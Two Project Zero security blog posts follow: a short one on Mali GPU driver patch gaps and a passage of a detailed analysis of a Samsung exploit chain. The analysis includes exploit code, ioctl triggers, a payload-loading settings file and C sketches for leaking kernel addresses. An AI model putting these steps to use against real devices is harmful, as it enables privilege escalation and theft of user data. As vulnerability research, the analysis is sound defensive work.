
Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-36449) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable.

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in-the-wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title: Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE: CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue: 6th January 2022

Impact: A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) led to kernel memory corruption, one (2331) led to physical memory addresses being disclosed to userspace and the remaining three (2325, 2327, 2333) led to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs: Arm Mali: driver exposes physical addresses to unprivileged userspace

@jgrusko (replying to @ProjectZeroBugs): RIP the feature that was there forever and nobody wanted to report :)

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits, and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blog post), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Maddie Stone, Project Zero


Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date, you can check under Settings that your device is running SMR Mar-2021 or later.


As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendors transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.


While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes. 


We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products. 

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a three-vulnerability chain where all three vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.


The sample used three vulnerabilities, all patched in March 2021 by Samsung: 

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337

  2. Kernel information leak via sec_log - CVE-2021-25369

  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370


The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example, Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC, while phones sold in most other places (e.g. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver, which are specific to the Exynos Samsung phones.


Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.


The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June. 

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user. 


Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider  Severity: Moderate Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0) Reported on: November 3, 2020 Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service."

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.


According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.


Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:
DATABASE_NAME = "clipboardimage.db"
TABLE_NAME = "ClipboardImageTable"
URL = "content://com.sec.android.semclipboardprovider/images"
CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";


Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.  


UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead, its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>


Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.


public Uri insert(Uri uri, ContentValues values) {
    long row = this.database.insert(TABLE_NAME, "", values);
    if (row > 0) {
        Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);
        getContext().getContentResolver().notifyChange(newUri, null);
        return newUri;
    }
    throw new SQLException("Fail to add a new record into " + uri);
}


The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.


The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.


ContentValues vals = new ContentValues();
vals.put("_data", "/data/system/users/0/newFile.bin");
Uri semclipboard_uri = Uri.parse("content://com.sec.android.semclipboardprovider");
ContentResolver resolver = getContentResolver();
Uri newFile_uri = resolver.insert(semclipboard_uri, vals);
return resolver.openFileDescriptor(newFile_uri, "w").getFd();


Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.

  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.

  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.

  4. Get the ContentResolver object that allows apps access to ContentProviders.

  5. Call insert on the semclipboardprovider with our key-value pair.

  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.


The exploit wrote its next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_apps don’t have permission to open or create users_system_data_file files, so in this case the exploit proxies the open through system_server, which can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to it. Once the clipboard content provider opens the file and passes the fd to the calling process, the calling process can read and write to it.


The exploit first uses this fd to write its next stage ELF file onto the file system. The contents of the stage 2 ELF were embedded within the original sample.


This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks whether the UID of the calling process is 1000, meaning that it is already also running with system privileges.


public Uri insert(Uri uri, ContentValues values) {
    if (Binder.getCallingUid() != 1000) {
        Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));
        return null;
    }
    long row = this.database.insert(TABLE_NAME, "", values);
    if (row > 0) {
        Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);
        getContext().getContentResolver().notifyChange(newUri, null);
        return newUri;
    }
    throw new SQLException("Fail to add a new record into " + uri);
}

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how does it load it outside of the current app sandbox? It uses the Samsung Text to Speech application (SamsungTTS.apk).


The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.


Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API. 


The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.


To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these two different paths for its Settings files.


<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="eng-USA-Variant Info">f00</string>
    <string name="SMT_STUBCHECK_STATUS">STUB_SUCCESS</string>
    <string name="SMT_LATEST_INSTALLED_ENGINE_PATH">/data/system/users/0/newFile.bin</string>
</map>


The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context. 


The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems that devices which launched on Android 10 (Q) shipped with the updated version of the SamsungTTS app, which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.


Phones released on Android P and earlier seem to have had a version of the app older than 3.0.08.18, which does load the executable, up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.


Once the ELF file is loaded via the System.load API, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (as system), the exploit continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak that discloses the addresses of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.


The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.


Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0) Reported on: December 10, 2020 Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file."


The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to be used only in situations where a kernel bug is detected, because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.


void __warn(const char *file, int line, void *caller, unsigned taint,
            struct pt_regs *regs, struct warn_args *args)
{
        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)
                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",
                        raw_smp_processor_id(), current->pid, file, line,
                        caller);
        else
                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",
                        raw_smp_processor_id(), current->pid, caller);

        if (args)
                vprintk(args->fmt, args->args);

        if (panic_on_warn) {
                /*
                 * This thread may hit another WARN() in the panic path.
                 * Resetting this prevents additional WARN() from panicking the
                 * system on this thread.  Other threads are blocked by the
                 * panic_mutex in panic().
                 */
                panic_on_warn = 0;
                panic("panic_on_warn set ...\n");
        }

        print_modules();

        dump_stack();

        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */
        add_taint(taint, LOCKDEP_STILL_OK);
}



On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 


a51:/ $ ls -alZ /dev/kmsg
crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg

$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy
allow domain dev_type:lnk_file { getattr ioctl lock map open read };
allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };


Samsung, however, has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.


The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F) still used a vulnerable version of the driver (r19p0) as of January 2021.



/**
 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.
 * @filp:   Non-NULL pointer to file structure.
 * @cmd:    User command.
 * @arg:    Command's argument.
 *
 * Return: 0 on success, else error code.
 */
static long kbasep_vinstr_hwcnt_reader_ioctl(
        struct file *filp,
        unsigned int cmd,
        unsigned long arg)
{
        long rcode;
        struct kbase_vinstr_client *cli;

        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))
                return -EINVAL;

        cli = filp->private_data;
        if (!cli)
                return -EINVAL;

        switch (cmd) {
        case KBASE_HWCNT_READER_GET_API_VERSION:
                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);
                break;
        case KBASE_HWCNT_READER_GET_HWVER:
                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(
                        cli, (u32 __user *)arg);
                break;
        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:
                rcode = put_user(
                        (u32)cli->vctx->metadata->dump_buf_bytes,
                        (u32 __user *)arg);
                break;

        [...]

        default:
                WARN_ON(true);
                rcode = -EINVAL;
                break;
        }

        return rcode;
}


Specifically, the WARN_ON is in the function kbasep_vinstr_hwcnt_reader_ioctl. To trigger it, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl, which initializes the hwcnt driver and returns an fd for subsequent hwcnt ioctls; the second is sent to that hwcnt fd with an invalid ioctl number: 0xFE.


hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);
ioctl(hwcnt_fd, 0x4004BEFE, 0);


To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:


setprop dumpstate.options bugreportfull;
setprop ctl.start bugreport;
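
Putting those pieces together, a rough C sketch of the trigger sequence might look like this (the /dev/mali0 path, the setup-argument buffer, and the repetition count are assumptions; the ioctl numbers are the ones from the snippet above, and __system_property_set is the native equivalent of setprop):

#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/system_properties.h>
#include <unistd.h>

static void trigger_warn_and_bugreport(void) {
    int mali_fd = open("/dev/mali0", O_RDWR);   /* assumed Mali device node */
    uint64_t setup_args[3] = {0};               /* placeholder for the setup struct */

    /* HWCNT_READER_SETUP: the return value is the hwcnt fd */
    int hwcnt_fd = ioctl(mali_fd, 0x40148008, setup_args);

    /* Invalid hwcnt ioctl number 0xFE: falls into the default case and hits WARN_ON */
    for (int i = 0; i < 4; i++)
        ioctl(hwcnt_fd, 0x4004BEFE, 0);

    /* Equivalent of the two setprop commands: dumpstate copies /proc/sec_log,
     * backtrace included, into /data/log/sec_log.log. */
    __system_property_set("dumpstate.options", "bugreportfull");
    __system_property_set("ctl.start", "bugreport");
}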


In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport. 


allow at_distributor ctl_start_prop:file { getattr map open read };
allow at_distributor ctl_start_prop:property_service set;
allow bootchecker ctl_start_prop:file { getattr map open read };
allow bootchecker ctl_start_prop:property_service set;
allow dumpstate property_type:file { getattr map open read };
allow hal_keymaster_default ctl_start_prop:file { getattr map open read };
allow hal_keymaster_default ctl_start_prop:property_service set;
allow ikev2_client ctl_start_prop:file { getattr map open read };
allow ikev2_client ctl_start_prop:property_service set;
allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };
allow init property_type:property_service set;
allow keystore ctl_start_prop:file { getattr map open read };
allow keystore ctl_start_prop:property_service set;
allow mediadrmserver ctl_start_prop:file { getattr map open read };
allow mediadrmserver ctl_start_prop:property_service set;
allow multiclientd ctl_start_prop:file { getattr map open read };
allow multiclientd ctl_start_prop:property_service set;
allow radio ctl_start_prop:file { getattr map open read };
allow radio ctl_start_prop:property_service set;
allow shell ctl_start_prop:file { getattr map open read };
allow shell ctl_start_prop:property_service set;
allow surfaceflinger ctl_start_prop:file { getattr map open read };
allow surfaceflinger ctl_start_prop:property_service set;
allow system_app ctl_start_prop:file { getattr map open read };
allow system_app ctl_start_prop:property_service set;
allow system_server ctl_start_prop:file { getattr map open read };
allow system_server ctl_start_prop:property_service set;
allow vold ctl_start_prop:file { getattr map open read };
allow vold ctl_start_prop:property_service set;
allow wlandutservice ctl_start_prop:file { getattr map open read };
allow wlandutservice ctl_start_prop:property_service set;


The bugreport service is defined in /system/etc/init/dumpstate.rc:


service bugreport /system/bin/dumpstate -d -p -B -z \
        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport
    class main
    disabled
    oneshot


The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.


The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.


  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));
  LOBYTE(s) = 18;
  v650[0] = 0LL;
  s_8 = 17664LL;
  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";
  DurationReporter::DurationReporter(v636, (__int64)&s, 0);
  if ( ((unsigned __int8)s & 1) != 0 )
    operator delete(v650[0]);
  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");


After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.
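
A minimal sketch of that wait, assuming nothing more than the standard inotify API and the directory named above:

#include <string.h>
#include <sys/inotify.h>
#include <unistd.h>

/* Block until dumpstate finishes writing /data/log/sec_log.log. */
static void wait_for_sec_log(void) {
    int ifd = inotify_init();
    inotify_add_watch(ifd, "/data/log/", IN_CLOSE_WRITE);
    char buf[4096];
    for (;;) {
        ssize_t len = read(ifd, buf, sizeof(buf));   /* blocks until an event fires */
        for (char *p = buf; p < buf + len; ) {
            struct inotify_event *ev = (struct inotify_event *)p;
            if (ev->len && !strcmp(ev->name, "sec_log.log")) {
                close(ifd);
                return;   /* the log file was closed after being written */
            }
            p += sizeof(*ev) + ev->len;
        }
    }
}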


An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.


<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------
<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664
<4>[90808.635663]  [4:    poc:25943] Modules linked in:
<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1
<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)
<4>[90808.635689]  [4:    poc:25943] Call trace:
<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280
<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24
<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4
<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164
<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c
<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c
<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150
<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164
<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)
<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000
<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a
<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b
<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026
<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000
<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004
<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000
<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80
<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008
<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c
<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74
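
The combing step could look roughly like the following sketch, assuming (as in the dump above) that the task_struct value is the first quadword on the "bb60:" line and the sys_call_table-related value the first on the "bbc0:" line:

#include <inttypes.h>
#include <stdio.h>
#include <string.h>

/* Scan sec_log.log for the exception stack lines ending in "b60:" and "bc0:"
 * and pull out the first quadword on each. */
static void parse_sec_log(uint64_t *task_struct_addr, uint64_t *syscall_table_addr) {
    FILE *f = fopen("/data/log/sec_log.log", "r");
    if (!f)
        return;
    char line[512], *p;
    while (fgets(line, sizeof(line), f)) {
        if ((p = strstr(line, "b60: ")))          /* matches the "bb60:" line */
            sscanf(p + 5, "%" SCNx64, task_struct_addr);
        else if ((p = strstr(line, "bc0: ")))     /* matches the "bbc0:" line */
            sscanf(p + 5, "%" SCNx64, syscall_table_addr);
    }
    fclose(f);
}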


The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.


$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app
allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };
allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };
allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };
allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };
allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };
allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };
allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.

  • Removed the bugreport service from dumpstate.rc.


In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver, which replaced the WARN_ON with the more appropriate pr_warn that does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0, which used pr_warn instead of WARN_ON.

  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.


Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access. 


Screenshot of the CVE-2021-25370 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19925 (CVE-2021-25370): Memory corruption in dpu driver  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0), R(11.0) devices with selected Exynos chipsets Reported on: December 12, 2020 Disclosure status: Privately disclosed. An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic. The patch fixes incorrect implementation in dpu driver to address memory corruption."

Find the PID of android.hardware.graphics.composer

To be able to trigger the vulnerability, the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process.


The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:


stream lids=0,3,4


The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.


Now it has the PID of android.hardware.graphics.composer, where android.hardware.graphics.composer is the Hardware Composer HAL.
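
A sketch of this PID discovery; the logdr handshake string is the one shown above, while the record-header layout (logger_entry_v4 below) is an assumption about this logd version:

#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Assumed layout of a logd reader record header (logger_entry, v4-era). */
struct logger_entry_v4 {
    uint16_t len;       /* payload length */
    uint16_t hdr_size;  /* header size = offset of the payload */
    int32_t  pid;       /* generating process's PID */
    uint32_t tid, sec, nsec, lid, uid;
};

static int find_composer_pid(void) {
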